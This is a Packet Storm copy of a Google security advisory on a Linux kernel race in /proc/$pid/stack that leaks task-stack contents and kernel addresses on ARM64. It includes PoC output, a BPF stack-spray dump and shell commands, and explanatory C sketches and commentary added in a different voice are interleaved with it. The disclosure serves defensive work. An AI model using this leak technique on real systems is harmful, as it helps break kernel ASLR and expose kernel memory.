
Linux Semi-Arbitrary Task Stack Read On ARM64 / x86

Posted Oct 18, 2018
Authored by Jann Horn, Google Security Research

Linux suffers from a semi-arbitrary task stack read on ARM64 (and x86) via /proc/$pid/stack.

tags | advisory, arbitrary, x86
systems | linux
SHA-256 | aa57cf6a492d7f45505fa3498cb8e656f5d02f443b0cde3a3cb505708affcfc3

Linux: semi-arbitrary task stack read on ARM64 (and x86) via /proc/$pid/stack 




This issue probably had the most impact on ARM64 kernels before
commit e01e80634ecd ("fork: unconditionally clear stack on fork", first in
v4.17); luckily, that hardening patch was backported all the way to v4.4 (but
not v3.16), so most systems probably have that patch already.

On both ARM64 and x86, /proc/$pid/stack can be used to inspect the symbolized
kernel stack of a task that is concurrently executing on another CPU. (x86 has
a check against this, but the check is racy, as a comment next to it
acknowledges.) This means that the kernel can attempt to unwind an active task
stack starting from an outdated frame pointer, causing it to interpret new
stack contents (potentially user-supplied data) as a stack frame.

On both x86 and ARM64, the kernel ensures that only stack frames inside the
target's task stack area are dereferenced.
On x86, it is also ensured that only stack frames whose saved instruction
pointer points to some valid text section are printed; on ARM64, stack frames
are printed independent of where the saved instruction pointer points.
The format specifier used for printing such stack traces is "%pB", which is
normally used for writing information about kernel crashes to the console; on
kernels with CONFIG_KALLSYMS, it is implemented by sprint_backtrace(), which
falls back to printing the raw address with "0x%lx" when the address can't be
mapped to a symbol.
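The symbolize-or-fall-back behaviour is what makes the first attack listed below work. The following is a simplified userspace sketch, not kernel code: `struct sym`, `format_backtrace_addr()` and the addresses are hypothetical, and the real implementation goes through kallsyms and handles details that are ignored here.

```c
#include <assert.h>
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical symbol table entry (stand-in for kallsyms data). */
struct sym {
    const char *name;
    uint64_t start; /* first address of the symbol */
    uint64_t size;  /* size in bytes */
};

/* Simplified model of "%pB": print "name+0xoff/0xsize" when addr falls
 * inside a known symbol, otherwise fall back to the raw "0x%lx" form. */
static void format_backtrace_addr(char *buf, size_t len, uint64_t addr,
                                  const struct sym *tab, size_t ntab)
{
    for (size_t i = 0; i < ntab; i++) {
        if (addr >= tab[i].start && addr - tab[i].start < tab[i].size) {
            snprintf(buf, len, "%s+0x%" PRIx64 "/0x%" PRIx64,
                     tab[i].name, addr - tab[i].start, tab[i].size);
            return;
        }
    }
    snprintf(buf, len, "0x%" PRIx64, addr); /* no symbol: raw address */
}
```

With a hypothetical table entry for _do_fork starting at 0xffff000008100000 with size 0x420, the address 0xffff0000081000e8 is printed as "_do_fork+0xe8/0x420", while 0xbadbeefbadbeef00 comes out unchanged as "0xbadbeefbadbeef00". Because the output differs depending on whether a fake saved instruction pointer lands inside a symbol, whoever controls that value gets an oracle for the kernel text layout.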

On ARM64, the kernel ensures that stack frames are 16-byte-aligned.
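The unwinding behaviour described in the last few paragraphs can be modelled in a few lines of userspace C. This is a hypothetical sketch, not the arm64 unwinder: `struct task_stack`, `walk()` and the addresses are invented for illustration, and only the two checks mentioned above (bounds and 16-byte alignment) are modelled.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define STACK_BYTES 256

/* Hypothetical task-stack model: buf[0] pretends to live at address base. */
struct task_stack {
    uint64_t base;
    unsigned char buf[STACK_BYTES];
};

static uint64_t load(const struct task_stack *s, uint64_t addr)
{
    uint64_t v;
    memcpy(&v, s->buf + (addr - s->base), sizeof v);
    return v;
}

static void put(struct task_stack *s, uint64_t addr, uint64_t v)
{
    memcpy(s->buf + (addr - s->base), &v, sizeof v);
}

/* ARM64-style frame-pointer walk. A frame record at fp is {next fp, saved lr}.
 * Only the checks described above are applied: the 16-byte record must lie
 * inside the task stack and fp must be 16-byte aligned. Nothing checks where
 * lr points, so every lr found is reported. */
static size_t walk(const struct task_stack *s, uint64_t fp,
                   uint64_t *out, size_t max)
{
    size_t n = 0;
    while (n < max) {
        if (fp % 16 != 0)
            break;
        if (fp < s->base || fp - s->base > STACK_BYTES - 16)
            break;
        out[n++] = load(s, fp + 8); /* saved lr, reported as-is */
        fp = load(s, fp);           /* follow the chain */
    }
    return n;
}
```

For example, with base 0x1000 and frame records at 0x1040 -> 0x1080, walk() reports both saved lr values. If the task then runs again and 0x1040 is overwritten with the record {0x10d0, 0xbadbeefbadbeef00}, the same starting address (now a stale frame pointer) makes walk() report 0xbadbeefbadbeef00 followed by whatever 8-byte value sits at 0x10d8. A misaligned start such as 0x1048, or one outside the stack, yields no entries.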

This leads to three potential attacks:

1. An attacker can fake a stack frame with a controlled fake instruction pointer
and observe to which symbol the kernel maps it. This could be used both to
break kernel text ASLR and (if the attacker doesn't have access to the kernel
image anyway) to gain more fine-grained information about the layout of
kernel code.
2. An attacker can fake a stack frame that points to an arbitrary location in
the task stack (subject to alignment constraints) in order to leak data
stored at that address into the stack trace returned to userspace.
(This is more practical on ARM64, but might also work on x86 if you only need
to leak one byte at a time.)
3. A denial of service that is, from my perspective, relatively boring: it
looks as if building a loop out of stack frames whose saved instruction
pointers point into scheduler code will send the task that is attempting to
read /proc/$pid/stack into an endless loop.
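The endless loop in the third attack is plausible if, as assumed here, return addresses that fall into scheduler code are filtered out of the trace without counting toward its entry limit; a cycle of such frames then never fills the output buffer. The sketch below is a hypothetical userspace model: SCHED_TEXT_START/SCHED_TEXT_END, `collect()` and the word-index frame layout are invented, and the `max_steps` budget is just one possible guard, not something the report proposes.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical address range standing in for scheduler text. */
#define SCHED_TEXT_START 0x5000u
#define SCHED_TEXT_END   0x6000u

static int in_sched_text(uint64_t lr)
{
    return lr >= SCHED_TEXT_START && lr < SCHED_TEXT_END;
}

/* Frames are {next word index, saved lr}; an even index stands in for
 * 16-byte alignment. Return addresses inside scheduler text are skipped
 * and do not count toward max, so a cycle of such frames never fills the
 * output. max_steps bounds the walk itself; *looped reports whether that
 * bound was hit. */
static size_t collect(const uint64_t *stack, size_t nwords, uint64_t fp,
                      uint64_t *out, size_t max, size_t max_steps,
                      int *looped)
{
    size_t n = 0;
    *looped = 0;
    for (size_t step = 0; n < max; step++) {
        if (step == max_steps) {
            *looped = 1;
            break;
        }
        if (fp % 2 != 0 || fp + 1 >= nwords)
            break;
        uint64_t lr = stack[fp + 1];
        if (!in_sched_text(lr))
            out[n++] = lr; /* only non-scheduler entries are recorded */
        fp = stack[fp];
    }
    return n;
}
```

With frames at word indices 0 and 2 pointing at each other and both saved lr values inside the fake scheduler range, collect() records 0 entries and sets *looped; without the step budget the loop would not terminate.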

I have written a PoC for attack 2 and tested it on a Raspberry Pi 3, using a
custom 64-bit build of the Raspberry Pi kernel (based on 4.18.y) with
CONFIG_BPF_SYSCALL manually enabled (because I'm too lazy to search for a more
normal way to spray things on the kernel stack in the right places), built with
gcc 7.2.0. I have attached the PoC as pipe_read.c. The PoC leaks the BPF frame
pointer.

Usage:

In terminal 1:
==============
pi@raspberrypi:~/stack_dump$ gcc -o pipe_read pipe_read.c -pthread && ./pipe_read
==========================
0: (18) r0 = 0xbadbeefbadbeef00
2: (bf) r1 = r10
3: (07) r1 += -24
4: (7b) *(u64 *)(r10 -16) = r10
5: (7b) *(u64 *)(r10 -40) = r1
6: (7b) *(u64 *)(r10 -48) = r0
7: (7b) *(u64 *)(r10 -56) = r1
8: (7b) *(u64 *)(r10 -64) = r0
9: (7b) *(u64 *)(r10 -72) = r1
10: (7b) *(u64 *)(r10 -80) = r0
11: (7b) *(u64 *)(r10 -88) = r1
12: (7b) *(u64 *)(r10 -96) = r0
13: (7b) *(u64 *)(r10 -104) = r1
14: (7b) *(u64 *)(r10 -112) = r0
15: (7b) *(u64 *)(r10 -120) = r1
16: (7b) *(u64 *)(r10 -128) = r0
17: (7b) *(u64 *)(r10 -136) = r1
18: (7b) *(u64 *)(r10 -144) = r0
19: (7b) *(u64 *)(r10 -152) = r1
20: (7b) *(u64 *)(r10 -160) = r0
21: (7b) *(u64 *)(r10 -168) = r1
22: (7b) *(u64 *)(r10 -176) = r0
23: (7b) *(u64 *)(r10 -184) = r1
24: (7b) *(u64 *)(r10 -192) = r0
25: (7b) *(u64 *)(r10 -200) = r1
26: (7b) *(u64 *)(r10 -208) = r0
27: (7b) *(u64 *)(r10 -216) = r1
[...]
1920: (7b) *(u64 *)(r10 -480) = r0
1921: (7b) *(u64 *)(r10 -488) = r1
1922: (7b) *(u64 *)(r10 -496) = r0
1923: (7b) *(u64 *)(r10 -504) = r1
1924: (7b) *(u64 *)(r10 -512) = r0
1925: (b7) r0 = 0
1926: (95) exit
processed 1926 insns (limit 131072), stack depth 512
==========================
==============
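Reading the verifier dump, the program sets r1 = r10 - 24, stores r10 at r10-16, and then alternates r1 and the marker in r0 in 8-byte slots down to r10-512. Interpreted as ARM64 frame records {next fp, saved lr}, every 16-byte-aligned record in the sprayed area says "next frame at r10-24, return address 0xbadbeefbadbeef00", and the record at r10-24 has r10 in its lr slot. That is our reading of the dump, assuming the elided instructions continue the same pattern; the sketch below replays those stores into a hypothetical stack model (`struct stack_model`, `bpf_spray()` and `unwind()` are invented) and walks it from a stale frame pointer inside the spray.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MARKER 0xbadbeefbadbeef00ULL
#define NWORDS 80 /* 640 bytes: room for the 512-byte BPF stack and a bit more */

/* Hypothetical model: words[i] lives at address base + 8 * i. */
struct stack_model {
    uint64_t base;
    uint64_t words[NWORDS];
};

static void store(struct stack_model *s, uint64_t addr, uint64_t v)
{
    s->words[(addr - s->base) / 8] = v;
}

/* Replays the stores from the verifier dump (assuming the elided part keeps
 * the pattern): *(r10 - 16) = r10, then r1 = r10 - 24 at r10-40, r10-56, ...
 * and the marker at r10-48, r10-64, ... down to r10-512. */
static void bpf_spray(struct stack_model *s, uint64_t r10)
{
    uint64_t r1 = r10 - 24;
    store(s, r10 - 16, r10);
    for (uint64_t off = 40; off <= 504; off += 16) {
        store(s, r10 - off, r1);
        store(s, r10 - off - 8, MARKER);
    }
}

/* ARM64-style walk over {next fp, saved lr} records with only the bounds and
 * 16-byte alignment checks; every saved lr found is reported. */
static size_t unwind(const struct stack_model *s, uint64_t fp,
                     uint64_t *out, size_t max)
{
    size_t n = 0;
    while (n < max && fp % 16 == 0 && fp >= s->base &&
           fp - s->base <= sizeof(s->words) - 16) {
        size_t i = (size_t)((fp - s->base) / 8);
        out[n++] = s->words[i + 1]; /* saved lr */
        fp = s->words[i];           /* next frame record */
    }
    return n;
}
```

With r10 = 0xffffff800e5cbb78 (the value that shows up in terminal 2 below, which is 8 mod 16 so the sprayed records are 16-byte aligned) and a stale frame pointer of r10 - 200, unwind() reports 0xbadbeefbadbeef00 followed by 0xffffff800e5cbb78. In this model the slot at r10-24 was never written and holds 0, which ends the walk; on a real kernel it holds whatever was left there.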

In terminal 2:
==============
$ while true; do cat /proc/$(pgrep pipe_read)/stack; done |grep -A1 badbeef
[...]
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffffdf36987000
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffffdf36987000
[...]
==============
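Each line of /proc/$pid/stack in the output above has the form "[<0>]" followed by the symbolized or raw address, and the grep -A1 in terminal 2 simply keeps the line after the marker. A hypothetical C equivalent that pulls the leaked value out of one dump might look like this; `parse_raw_entry()` and `leaked_after_marker()` are invented names.

```c
#include <assert.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Parses one "[<0>] 0x..." line; returns 1 if it holds a raw hex address. */
static int parse_raw_entry(const char *line, uint64_t *addr)
{
    return sscanf(line, "[<0>] 0x%" SCNx64, addr) == 1;
}

/* Scans a /proc/$pid/stack dump (one entry per line) for the marker and
 * returns, via *leak, the raw address printed on the line right after it,
 * mimicking `grep -A1 badbeef`. Returns 1 if found, 0 otherwise. */
static int leaked_after_marker(const char *dump, uint64_t marker,
                               uint64_t *leak)
{
    const char *line = dump;
    int seen_marker = 0;
    while (line && *line) {
        uint64_t v;
        if (parse_raw_entry(line, &v)) {
            if (seen_marker) {
                *leak = v;
                return 1;
            }
            seen_marker = (v == marker);
        } else {
            seen_marker = 0; /* symbolized entry breaks the pair */
        }
        line = strchr(line, '\n');
        if (line)
            line++;
    }
    return 0;
}
```

Given the two lines "[<0>] 0xbadbeefbadbeef00" and "[<0>] 0xffffff800e5cbb78", leaked_after_marker() stores 0xffffff800e5cbb78 in *leak and returns 1.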

In terminal 3 (note that this requires kernel.kptr_restrict==1; with
kptr_restrict=0, the addresses are printed in hashed form and look like garbage):
==============
# grep _do_fork /proc/vmallocinfo | grep 0xffffff800e5c
0xffffff800e5c8000-0xffffff800e5cd000 20480 _do_fork+0xe8/0x420 pages=4 vmalloc
#
==============
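Terminal 3 shows what the leaked value points to: 0xffffff800e5cbb78 lies inside the vmalloc area 0xffffff800e5c8000-0xffffff800e5cd000 allocated from _do_fork, at offset 0xffffff800e5cbb78 - 0xffffff800e5c8000 = 0x3b78, which is consistent with a pointer into a task stack. A small sketch of that range check against the line format shown above, with hypothetical helper names:

```c
#include <assert.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

/* Parses the "0xSTART-0xEND" range at the start of a /proc/vmallocinfo line
 * such as the one above. Returns 1 on success. */
static int parse_vmalloc_range(const char *line, uint64_t *start,
                               uint64_t *end)
{
    return sscanf(line, "0x%" SCNx64 "-0x%" SCNx64, start, end) == 2;
}

/* Half-open range check: start <= addr < end. */
static int addr_in_range(uint64_t addr, uint64_t start, uint64_t end)
{
    return addr >= start && addr < end;
}
```

For the line shown above, parse_vmalloc_range() yields a 20480-byte (0x5000) range; addr_in_range() is true for 0xffffff800e5cbb78 and false for the other value seen in terminal 2, 0xffffffdf36987000.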


I'm not sure what the best fix for this is.

32-bit ARM is playing it safe and just refuses to print stack traces for
non-current tasks if CONFIG_SMP is on:
==============
    if (tsk != current) {
#ifdef CONFIG_SMP
        /*
         * What guarantees do we have here that 'tsk' is not
         * running on another CPU? For now, ignore it as we
         * can't guarantee we won't explode.
         */
        if (trace->nr_entries < trace->max_entries)
            trace->entries[trace->nr_entries++] = ULONG_MAX;
        return;
#else
[...]
==============

With my "annoying security person" hat on: Would it make sense to just gate
proc_pid_stack() on file_ns_capable(m->file, &init_user_ns, CAP_SYS_ADMIN)?
That way, even if the unwind code gets some edgecase wrong, it won't cause the
disclosure of kernel memory to userspace.

If this code should continue to work without CAP_SYS_ADMIN, solving the issue is
probably not so straightforward...

One approach would be to fire an IPI to request that the target task dump its
own stack.

Another approach might be to check, between every read of a pointer from the
target's stack and its dereference, whether the target task has been
scheduled in the meantime, perhaps by checking p->nvcsw, p->nivcsw and
p->on_cpu, if that works without races. The reason I'd want more than a
single check at the end for this approach is (non-speculative) side
channels: a check only at the end would suppress the output, but the
intermediate dereferences of stale pointers could already have leaked
information.
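The per-dereference check can be sketched as follows. This is a hypothetical single-threaded model, not a proposed patch: `struct task_model` merely borrows the names nvcsw, nivcsw and on_cpu, and the model ignores the memory-ordering questions that the "without races" caveat refers to. What it illustrates is where the check sits: after each frame record is read and before the pointer in it is followed.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical model of the target task (not the kernel's task_struct). */
struct task_model {
    unsigned long nvcsw;   /* voluntary context switches */
    unsigned long nivcsw;  /* involuntary context switches */
    int on_cpu;            /* nonzero while the task is running */
    const uint64_t *stack; /* task stack as 64-bit words */
    size_t nwords;
};

static unsigned long task_snapshot(const struct task_model *t)
{
    return t->nvcsw + t->nivcsw;
}

/* True if the task looks like it has not run since the snapshot. */
static int task_unchanged(const struct task_model *t, unsigned long snap)
{
    return !t->on_cpu && task_snapshot(t) == snap;
}

/* One unwind step over {next word index, saved lr} records; an even index
 * stands in for 16-byte alignment. The values just read are handed back
 * (and *fp advanced) only if the task still looks unchanged.
 * Returns 1 on success, 0 at the end of the chain, -1 if the task may
 * have run, in which case the whole trace must be discarded. */
static int unwind_step(const struct task_model *t, unsigned long snap,
                       uint64_t *fp, uint64_t *lr)
{
    if (*fp % 2 != 0 || *fp + 1 >= t->nwords)
        return 0;
    uint64_t next = t->stack[*fp];
    uint64_t ret = t->stack[*fp + 1];
    if (!task_unchanged(t, snap))
        return -1;
    *fp = next;
    *lr = ret;
    return 1;
}

/* Walks the whole chain; returns the number of entries, or -1 if aborted. */
static long unwind_checked(const struct task_model *t, uint64_t fp,
                           uint64_t *out, size_t max)
{
    if (t->on_cpu)
        return -1;
    unsigned long snap = task_snapshot(t);
    size_t n = 0;
    while (n < max) {
        uint64_t lr;
        int r = unwind_step(t, snap, &fp, &lr);
        if (r < 0)
            return -1;
        if (r == 0)
            break;
        out[n++] = lr;
    }
    return (long)n;
}
```

If nivcsw is incremented between two unwind_step() calls, the second call returns -1, so the walk stops before following any pointer read after the task was rescheduled; if on_cpu is set, unwind_checked() refuses to start at all.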


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.



Found by: jannh

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close